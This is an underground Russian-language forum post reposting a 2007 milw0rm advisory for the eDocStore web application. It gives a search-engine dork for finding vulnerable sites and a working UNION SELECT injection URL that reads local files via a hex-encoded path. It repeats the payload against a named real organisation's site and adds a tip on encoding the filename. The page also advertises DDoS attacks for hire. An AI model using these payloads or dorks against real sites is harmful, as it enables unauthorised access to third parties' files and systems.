Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Barbaddos
Rutor


[ DDos Услуги. DDos атака на заказ. Заказать ДДос ]


eDocStore Latest Versions Local File Inclusion Vulnerbilitys

Автор aka PSIH , 26 Jun 2007 12:00

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aka PSIH
Отправлено 26 June 2007 - 12:00

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
AUTHOR: t0pP8uZz & xprog (good work xprog)

SCRIPT DOWNLOAD: N/A

SITE: ]]>http://www.edocstore.co.uk]]>

DORK: intext:"Powered by eDocStore"


EXPLOITS:

EXPLOIT 1:
http://www.site.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

EXAMPLES:

EXAMPLE 1:
http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

Note/Tip: The filename for the incluson has got to be hexed before you can include it.
Its only required to replace the first hex value before the ","

©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости